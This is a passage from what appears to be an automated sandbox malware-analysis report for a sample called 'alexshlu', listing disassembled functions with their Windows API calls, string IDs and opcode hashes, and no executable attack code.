                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                        • String ID: I,~M$PQ$cba`$cba`$cba`$wEtG$Wu
                                                                                                                                                                                                                                        • API String ID: 764372645-3643945649
                                                                                                                                                                                                                                        • Opcode ID: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                                                                                                                                                                        • Instruction ID: ce701afe96e54189f6fff091c8333c98f5ae15aa60c98f01a083bef101dadeb2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47063c938c01330124c9dc59b6d375a3b8a360990f39732c0e3748d67b9dcd4f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C59235746093409FE714CF65D891B6BBBE2EBD5300F28882EE58487391D7799C81CB9B
                                                                                                                                                                                                                                        Function 00425920 Relevance: 12.9, Strings: 10, Instructions: 398COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
                                                                                                                                                                                                                                        • API String ID: 0-3047316687
                                                                                                                                                                                                                                        • Opcode ID: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                                                                                                                                                                        • Instruction ID: 146473404e5499b4986dffa8d26f26e1c07bf5215faae6f3d7194190b628d0b4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45c83a3ddc5386c7eaecb6d0721308efe7616dc8ac7a87c6f5778f813dbd46f5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2D124B9608380DFE324DF15E88176BB7E1FBD5304F94982DE58587261D738D901CB4A
                                                                                                                                                                                                                                        Function 00431A30 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109clipboardCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                        • String ID: K
                                                                                                                                                                                                                                        • API String ID: 2832541153-856455061
                                                                                                                                                                                                                                        • Opcode ID: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                                                                                                                                                                        • Instruction ID: 513562b2ac7e6d1d4712994eff6d7c1bc04b9d90a7c3137532ed1f51a9abc6ba
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 027abc228ed841da0674a97a3735ab7f080d79d715808bd082ae78d0cbe3e8e1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34418E6150C7818ED310AF7C988826FBFE09B96224F044A6EE8E5872D2E6389549C797
                                                                                                                                                                                                                                        Function 002BFBD2 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: GetLastError.KERNEL32(00000000,?,002BCF02), ref: 002BAB27
                                                                                                                                                                                                                                          • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000,?,?,00000028,002B6E76), ref: 002BABC9
                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 002BFCDA
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 002BFD18
                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 002BFD2B
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002BFD73
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002BFD8E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                        • String ID: l#-
                                                                                                                                                                                                                                        • API String ID: 415426439-1174061122
                                                                                                                                                                                                                                        • Opcode ID: f750735201fc7f275fd2f8d7edc1ed013de19cda4fd2dab0519fd5407e84d1d0
                                                                                                                                                                                                                                        • Instruction ID: 2cf4e852554080a4c3d2c87c262529d6c3baab2c87887822b74bc044dea2082b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f750735201fc7f275fd2f8d7edc1ed013de19cda4fd2dab0519fd5407e84d1d0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA517072A2020AAFDB50DFA5DD45BFAB7B8BF04740F14457AE900E7191E770DA608B61
                                                                                                                                                                                                                                        Function 002A1B70 Relevance: 9.3, APIs: 6, Instructions: 267filewindowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 002A1000: _strlen.LIBCMT ref: 002A1067
                                                                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 002A1BE1
                                                                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002A1C07
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002A1C16
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 002A1C84
                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002A1E83
                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 002A1EE0
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CloseFileHandle_strlen$MessagePostQuitReadSize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2365707584-0
                                                                                                                                                                                                                                        • Opcode ID: 05f905580b39da053164009eda4a1cb442d1d45d9492e7864850a4413590c097
                                                                                                                                                                                                                                        • Instruction ID: 9470c7981e5e7a9d749ac393af3d60380e6f350b45d33afe3da5fa82619ad1cb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05f905580b39da053164009eda4a1cb442d1d45d9492e7864850a4413590c097
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 779127729243119FC314DF24D88962BBBE5FF8A360F15492EF8858B351EB34D964CB92
                                                                                                                                                                                                                                        Function 004296D8 Relevance: 9.1, Strings: 7, Instructions: 340COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
                                                                                                                                                                                                                                        • API String ID: 0-154584671
                                                                                                                                                                                                                                        • Opcode ID: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                                                                                                                                                                                                                        • Instruction ID: 21be1e4f2e6752f9380b4aadbcf4cd787e7e0f4b09ea5b297d7e9ef9a1fb0c4b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e51a02978bc99ce7d016768a4801fe2a924607298026115374562d3702a8947
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FC1077560C3A08FC3118F29D89066BBBE2AF96310F588A6DF4E1573D2C7398D45CB5A
                                                                                                                                                                                                                                        Function 002C0337 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,002BFD08,00000002,00000000,?,?,?,002BFD08,?,00000000), ref: 002C03D0
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,002BFD08,00000002,00000000,?,?,?,002BFD08,?,00000000), ref: 002C03F9
                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,002BFD08,?,00000000), ref: 002C040E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                        • Opcode ID: 8ffb384c85dcb8e51ac89edea683d46281f9cf943493bf015496a89c230dcde5
                                                                                                                                                                                                                                        • Instruction ID: 0c50fef38c3fc7d449497c65fdc70dc6289659413f9d5f18a340ea6ecfd5be6b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ffb384c85dcb8e51ac89edea683d46281f9cf943493bf015496a89c230dcde5
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0321C422A20246EBDB34CF14C884F9B73A6AF54B54B5682ADE90AE7101E732DE50C390
                                                                                                                                                                                                                                        Function 0042B763 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 308COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: 3$qjjw$Wu
                                                                                                                                                                                                                                        • API String ID: 3664257935-1093458801
                                                                                                                                                                                                                                        • Opcode ID: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                                                                                                                                                                                                                        • Instruction ID: e0248e225440bb7285b8803733d60271f7e61eb44642cbaa2f092a8799675a72
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3641d3b1d95d9d0e2252580d4e70a4747529bd2a480d62c0a42bd322f018f1c7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29A16C717083919BE7248F24C8917ABBBD2EFD2340F18856ED5C94B3C6DB384405D796
                                                                                                                                                                                                                                        Function 0042D085 Relevance: 6.6, Strings: 5, Instructions: 368COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: #$0$AGsW$P$k
                                                                                                                                                                                                                                        • API String ID: 0-1629916805
                                                                                                                                                                                                                                        • Opcode ID: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                                                                                                                                                                                        • Instruction ID: 8816b6b3b95a3b8c405e0a0f8c285763547ceed8af8c8b555c70c7a9f783aa76
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a92c176f258902a07af39c1f8e4a41f6c7503ef90e7a1abad74dc0064dca0dbd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CC1F4317183918ED328CF39D4513ABBBD2AFD2304F68866ED4D58B2D1D6798449C71B
                                                                                                                                                                                                                                        Function 002B8900 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: c833190d3595b4907967d4d4129b7b381ff8ffd123d7f024cd91791e4d9d99b7
                                                                                                                                                                                                                                        • Instruction ID: 4c1107ecee76cf71415ea72be9a9774ed45dd03c38f32283a58cd8aaa95c0618
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c833190d3595b4907967d4d4129b7b381ff8ffd123d7f024cd91791e4d9d99b7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22022E71E1121A9BDF14CFA8C8806EDBBF5FF48354F24826AD519E7381DB31A951CB90
                                                                                                                                                                                                                                        Function 002C0919 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002C0A09
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                                                                                        • Opcode ID: fbd89c8ca18954d0f2da6934f39e25f7bff7f14be4c2513020833ea9d59ceb93
                                                                                                                                                                                                                                        • Instruction ID: 2488791256b59bbe1b286f439779ab4f8efdd086614be3a8fd5e1fec34065f27
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fbd89c8ca18954d0f2da6934f39e25f7bff7f14be4c2513020833ea9d59ceb93
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B71C1719152699FDF21EF68CCC9FAEBBB8AF05304F1442DDE048A3251DA314EA58F10
                                                                                                                                                                                                                                        Function 002AD86F Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002AD87B
                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 002AD947
                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002AD960
                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 002AD96A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 254469556-0
                                                                                                                                                                                                                                        • Opcode ID: ae5a2b7fd03f88a0dcead4c5380f9509c4d27864869bda5fe4dedf9cb09ec46d
                                                                                                                                                                                                                                        • Instruction ID: 5f0b3a1e9a69a5f7047e60f8f04b8c188a856ac32efe59ad1d8df2830a850a23
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae5a2b7fd03f88a0dcead4c5380f9509c4d27864869bda5fe4dedf9cb09ec46d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 723108B5D1521D9BDF21EFA4D8897CDBBB8AF08700F1041AAE40DAB250EB749B85CF45
                                                                                                                                                                                                                                        Function 00415ADC Relevance: 5.4, Strings: 4, Instructions: 398COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 1/3T$WL$^Q$neA
                                                                                                                                                                                                                                        • API String ID: 0-3205570823
                                                                                                                                                                                                                                        • Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                                                                                                                                                                        • Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94
                                                                                                                                                                                                                                        Function 00420717 Relevance: 3.4, Strings: 2, Instructions: 854COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: B:@<$F>?0
                                                                                                                                                                                                                                        • API String ID: 0-4011826714
                                                                                                                                                                                                                                        • Opcode ID: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                                                                                                                                                                                        • Instruction ID: 92ed06d7aa227fc4673e4b6d33fedd1ff2714f2f2b1d0eb8acbab6dee258af69
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E43256B1A00721CBCB24CF24C892267BBB1FF92310F59825DD8825F796E779A851CBD5
                                                                                                                                                                                                                                        Function 00414F08 Relevance: 3.1, Strings: 2, Instructions: 609COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: =UA$cba`
                                                                                                                                                                                                                                        • API String ID: 0-2849403845
                                                                                                                                                                                                                                        • Opcode ID: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                                                                                                                                                                                        • Instruction ID: b0755fcd4efdf1967727a5f4be91126eb1e252dcdfc562f5600afc0ab194aa5f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9402FE34608300EFD7149F24D962BABB7B1FB9A304F94582DF481972A2D775EC45CB8A
                                                                                                                                                                                                                                        Function 00422270 Relevance: 3.0, Strings: 2, Instructions: 501COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: TU$c!"
                                                                                                                                                                                                                                        • API String ID: 0-3813282519
                                                                                                                                                                                                                                        • Opcode ID: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                                                                                                                                                                                        • Instruction ID: a4d5b8c078bf2433dc24120fb7555f1f32600d90c3be649242fb2c546733d6d2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27C16672B04310ABD714DB29ED5277BB3E2EFD5314F48852EE88587381E6BCE801875A
                                                                                                                                                                                                                                        Function 0041D074 Relevance: 2.7, Strings: 2, Instructions: 211COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: pr$|~
                                                                                                                                                                                                                                        • API String ID: 0-4145297803
                                                                                                                                                                                                                                        • Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                                                                                                                                                                        • Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E
                                                                                                                                                                                                                                        Function 0041D087 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
